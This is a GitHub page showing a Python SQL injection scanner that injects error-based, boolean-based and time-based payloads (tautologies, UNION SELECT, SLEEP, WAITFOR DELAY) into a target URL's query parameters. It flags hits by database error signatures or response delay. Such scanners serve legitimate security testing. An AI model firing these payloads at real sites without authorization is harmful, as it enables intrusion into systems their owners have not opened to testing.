-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathbasic_sqli.py
More file actions
193 lines (164 loc) · 7.05 KB
/
basic_sqli.py
File metadata and controls
193 lines (164 loc) · 7.05 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
import requests
import re
import threading
import time
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from colorama import Fore, init
from optparse import OptionParser
# Initialize colorama for colored output. autoreset=True asks colorama to
# reset the color after every print, which is why the print calls in this
# file prepend a Fore.* color but never append a reset code.
init(autoreset=True)
# SQL Injection payloads: error-based, boolean-based, time-based, etc.
SQLI_PAYLOADS = {
    # Tautology / contradiction / UNION probes terminated with a SQL comment.
    "error_based": [
        "' OR 1=1--",
        "' AND 1=2--",
        "' UNION SELECT 1,2,3--",
    ],
    # Quote-balanced conditions that are always true or always false.
    "boolean_based": [
        "' OR '1'='1",
        "' AND '1'='2",
        "' OR 'a'='a",
    ],
    # Payloads that ask the database to pause for 5 seconds
    # (MySQL-style SLEEP and SQL Server-style WAITFOR DELAY).
    "time_based": [
        "' OR SLEEP(5)--",
        "'; WAITFOR DELAY '0:0:5'--",
    ],
}
# Known SQL error messages (from various databases)
# Every signature MUST be lower-case: the response body is lower-cased before
# it is searched, so an entry containing upper-case letters can never match.
# NOTE(review): short generic entries such as "union select" or "sqlite" may
# also match a page that merely echoes the payload or mentions the product;
# tighten them if false positives become a problem.
SQL_ERRORS = [
    "you have an error in your sql syntax",
    "warning: mysql",
    "unclosed quotation mark",
    "quoted string not properly terminated",
    "sql syntax",
    "syntax error",
    "ora-01756",
    "union select",
    "pg_query",
    "sqlite",
]
# Function to print a banner
def print_banner():
    """Print the tool's ASCII-art banner and tagline in green."""
    # The art lives in a triple-quoted string, so its lines must stay at
    # column 0 regardless of the surrounding code indentation.
    banner = '''
██████ █████ ██▓ ██▓
▒██ ▒ ▒██▓ ██▒▓██▒ ▓██▒
░ ▓██▄ ▒██▒ ██░▒██░ ▒██▒
▒ ██▒░██ █▀ ░▒██░ ░██░
▒██████▒▒░▒███▒█▄ ░██████▒░██░
▒ ▒▓▒ ▒ ░░░ ▒▒░ ▒ ░ ▒░▓ ░░▓
░ ░▒ ░ ░ ░ ▒░ ░ ░ ░ ▒ ░ ▒ ░
░ ░ ░ ░ ░ ░ ░ ▒ ░
░ ░ ░ ░ ░
Basic SQL Injection Scanner - Python tool
'''
    print(Fore.GREEN + banner)
# Function to send a GET request
def send_request(url, headers=None):
    """Issue a GET request to *url* and return the response.

    The request uses a 10-second timeout and disables TLS certificate
    verification (``verify=False``).

    Args:
        url: Fully-formed URL to fetch.
        headers: Optional dict of extra HTTP headers.

    Returns:
        The ``requests`` response object, or ``None`` when the request raised
        ``requests.RequestException`` (the error is printed in red).
    """
    try:
        return requests.get(url, headers=headers, timeout=10, verify=False)
    except requests.RequestException as exc:
        print(Fore.RED + f"Error with request: {exc}")
    return None
# Function to check if a response indicates a SQL error
def check_for_sqli(response):
    """Return True when the response body contains a known SQL error signature.

    Args:
        response: A response object exposing ``.text``, or ``None`` when the
            request failed.

    Returns:
        ``True`` if any entry of ``SQL_ERRORS`` occurs (case-insensitively) in
        the body, otherwise ``False``. ``None`` always yields ``False``.
    """
    # Compare against None explicitly: a requests.Response is falsy for
    # 4xx/5xx status codes, and database errors are very often delivered
    # with an HTTP 500, so a plain truthiness test would skip exactly the
    # responses that matter.
    if response is None:
        return False

    # Lower-case the body once instead of once per signature.
    body = response.text.lower()
    # Lower-case the signature too so mixed-case entries can still match.
    return any(signature.lower() in body for signature in SQL_ERRORS)
# Function to inject payload into a specific parameter
def replace_param(url, param, payload):
    """Return *url* with query parameter *param* set to *payload*.

    All other query parameters are carried over, including those with an
    empty value. The payload is URL-encoded by ``urlencode``. If *param*
    occurs several times in the query, the occurrences collapse into a single
    ``param=payload`` pair; if it does not occur, it is appended.

    Args:
        url: The original URL.
        param: Name of the query parameter to overwrite.
        payload: Raw (unencoded) value to inject.

    Returns:
        The rebuilt URL as a string.
    """
    parsed_url = urlparse(url)
    # keep_blank_values=True: by default parse_qs drops "name=" pairs, which
    # would silently remove parameters from the request being tested.
    query = parse_qs(parsed_url.query, keep_blank_values=True)
    query[param] = payload
    new_query = urlencode(query, doseq=True)
    return urlunparse(parsed_url._replace(query=new_query))
# Function to test each payload
def test_payload(url, param, payload, headers=None):
    """Inject *payload* into *param* and look for SQL error signatures.

    Args:
        url: Target URL containing the parameter.
        param: Query parameter to inject into.
        payload: Injection string to send.
        headers: Optional dict of extra HTTP headers.

    Returns:
        The modified URL when the response looks vulnerable, otherwise
        ``None`` (also when the request itself failed).
    """
    modified_url = replace_param(url, param, payload)
    response = send_request(modified_url, headers)
    # Explicit None check: a requests.Response evaluates to False for 4xx/5xx
    # statuses, which is how many applications report a database error.
    if response is not None and check_for_sqli(response):
        print(Fore.RED + f"[+] SQL Injection found on parameter '{param}' with payload '{payload}'")
        print(Fore.RED + f"URL: {modified_url}")
        return modified_url
    return None
# Function to test for time-based blind SQL injection
def test_time_based_payload(url, param, payload, delay, headers=None):
    """Inject a delaying *payload* and flag the parameter if the reply is slow.

    Args:
        url: Target URL containing the parameter.
        param: Query parameter to inject into.
        payload: Time-delay injection string to send.
        delay: Minimum round-trip time in seconds that counts as a hit.
        headers: Optional dict of extra HTTP headers.

    Returns:
        The modified URL when a response arrived and took at least *delay*
        seconds, otherwise ``None``.

    NOTE(review): no baseline request is timed, so a server that is simply
    slow can produce a false positive.
    """
    modified_url = replace_param(url, param, payload)
    # Use a monotonic clock so a system clock adjustment during the request
    # cannot distort the measured duration.
    started = time.monotonic()
    response = send_request(modified_url, headers)
    elapsed = time.monotonic() - started
    # Explicit None check: a requests.Response is falsy for 4xx/5xx statuses,
    # yet a delayed error page is still evidence that the payload executed.
    if response is not None and elapsed >= delay:
        print(Fore.RED + f"[+] Time-based Blind SQL Injection found on parameter '{param}' with payload '{payload}'")
        print(Fore.RED + f"URL: {modified_url}")
        return modified_url
    return None
# Function to get parameters from a URL
def get_parameters(url):
    """Return the distinct query parameter names of *url*, in order.

    Names are percent-decoded (as ``parse_qs`` returns them), parameters with
    an empty value are included, and a name that occurs several times is
    listed once.

    Args:
        url: URL whose query string is inspected.

    Returns:
        A list of parameter names; empty when the URL has no query string.
    """
    query = urlparse(url).query
    # parse_qs returns a dict, so iteration yields each name once in
    # first-seen order; keep_blank_values=True retains "name=" parameters,
    # which are valid injection points too.
    return list(parse_qs(query, keep_blank_values=True))
# Function to scan URL for SQL Injection vulnerabilities
def scan_url(url, headers=None, delay=5, verbose=False):
    """Test every query parameter of *url* with every payload, sequentially.

    Error-based and boolean-based payloads are judged by the SQL error
    signatures in the response; time-based payloads are judged by response
    time only.

    Args:
        url: Target URL with at least one query parameter.
        headers: Optional dict of extra HTTP headers.
        delay: Seconds a time-based request must take to count as a hit.
        verbose: When true, print each test before it is sent.

    Returns:
        A list of the modified URLs that were flagged as vulnerable.
    """
    results = []
    for param in get_parameters(url):
        # Error-based and boolean-based payload testing.
        for category, payloads in SQLI_PAYLOADS.items():
            # Time-based payloads have their own timed pass below; sending
            # them here as well would issue every slow request twice.
            if category == "time_based":
                continue
            for payload in payloads:
                if verbose:
                    print(Fore.GREEN + f"Testing parameter '{param}' with {category} payload '{payload}'")
                result = test_payload(url, param, payload, headers)
                if result:
                    results.append(result)

        # Time-based blind payload testing.
        for payload in SQLI_PAYLOADS["time_based"]:
            if verbose:
                print(Fore.GREEN + f"Testing parameter '{param}' with time-based payload '{payload}'")
            result = test_time_based_payload(url, param, payload, delay, headers)
            if result:
                results.append(result)
    return results
# Multithreading to scan with multiple threads
def scan_url_multithreaded(url, headers=None, delay=5, threads=5, verbose=False):
    """Scan *url* for SQL injection, spreading the tests over worker threads.

    The work is split into one task per (parameter, payload) pair, and each
    task runs exactly once on a thread pool. Running the whole scan in every
    thread would multiply the traffic and report each finding once per
    thread without finishing any sooner.

    Args:
        url: Target URL with at least one query parameter.
        headers: Optional dict of extra HTTP headers.
        delay: Seconds a time-based request must take to count as a hit.
        threads: Number of worker threads; values below 1 are treated as 1.
        verbose: When true, print each test before it is sent.

    Returns:
        A list of the modified URLs that were flagged as vulnerable, in task
        order (parameter, then payload category, then payload).
    """
    # Imported here so the block does not depend on a new file-level import.
    from concurrent.futures import ThreadPoolExecutor

    print(Fore.GREEN + f"[+] Starting scan with {threads} threads")

    tasks = [
        (param, category, payload)
        for param in get_parameters(url)
        for category, payloads in SQLI_PAYLOADS.items()
        for payload in payloads
    ]
    if not tasks:
        return []

    def run_task(task):
        """Run one test and return the flagged URL, or None."""
        param, category, payload = task
        if category == "time_based":
            if verbose:
                print(Fore.GREEN + f"Testing parameter '{param}' with time-based payload '{payload}'")
            return test_time_based_payload(url, param, payload, delay, headers)
        if verbose:
            print(Fore.GREEN + f"Testing parameter '{param}' with {category} payload '{payload}'")
        return test_payload(url, param, payload, headers)

    # ThreadPoolExecutor rejects max_workers <= 0, so clamp to at least one.
    with ThreadPoolExecutor(max_workers=max(1, threads)) as pool:
        # pool.map yields results in task order, keeping the output stable.
        return [hit for hit in pool.map(run_task, tasks) if hit]
# Save results to file
def save_results(results, filename):
    """Write each result on its own line to *filename*.

    Args:
        results: Iterable of result strings (the flagged URLs).
        filename: Path of the file to create or overwrite.

    When *results* is empty nothing is written and a notice is printed
    instead.
    """
    if not results:
        print(Fore.RED + "[-] No vulnerabilities found to save.")
        return

    with open(filename, 'w') as out:
        out.writelines(entry + '\n' for entry in results)
    print(Fore.GREEN + f"[+] Results saved to {filename}")
# Main function to parse command-line arguments and execute the scanner
def main():
    """Parse the command line, run the scan, and report or save the findings.

    Options:
        --url      Target URL (required).
        --headers  Comma-separated ``Name: value`` pairs sent with each request.
        --verbose  Print every test as it is sent.
        --threads  Number of concurrent threads (default 5).
        --delay    Seconds a time-based request must take to count (default 5).
        --output   File to write the flagged URLs to.
    """
    print_banner()

    # Parse command line options
    parser = OptionParser()
    parser.add_option('--url', dest="url", help="Target URL", metavar="URL")
    parser.add_option('--headers', dest="headers", help="Custom headers for requests")
    parser.add_option('--verbose', dest="verbose", action="store_true", help="Enable verbose output")
    parser.add_option('--threads', dest="threads", default=5, type="int", help="Number of concurrent threads")
    parser.add_option('--delay', dest="delay", default=5, type="int", help="Delay in seconds for time-based SQLi")
    parser.add_option('--output', dest="output", help="File to save the results")
    options, args = parser.parse_args()

    if not options.url:
        print(Fore.RED + "[-] Please provide a URL with --url.")
        return

    # Prepare headers (if provided)
    headers = None
    if options.headers:
        headers = {}
        for entry in options.headers.split(","):
            # Split on the FIRST colon only, so values that contain colons
            # themselves (URLs, host:port, timestamps) are kept whole.
            name, separator, value = entry.partition(":")
            if not separator or not name.strip():
                # Report a malformed entry rather than crashing on it.
                print(Fore.RED + f"[-] Ignoring malformed header '{entry.strip()}' (expected 'Name: value').")
                continue
            headers[name.strip()] = value.strip()

    # Start the scan
    results = scan_url_multithreaded(
        options.url,
        headers=headers,
        delay=options.delay,
        threads=options.threads,
        verbose=options.verbose,
    )
    if results:
        print(Fore.RED + f"[+] Found {len(results)} potential vulnerabilities!")
    else:
        print(Fore.GREEN + "[-] No vulnerabilities found.")

    # Save results if an output file is specified
    if options.output:
        save_results(results, options.output)
# Run the scanner only when this file is executed as a script, so importing
# the module does not start a scan.
if __name__ == "__main__":
    main()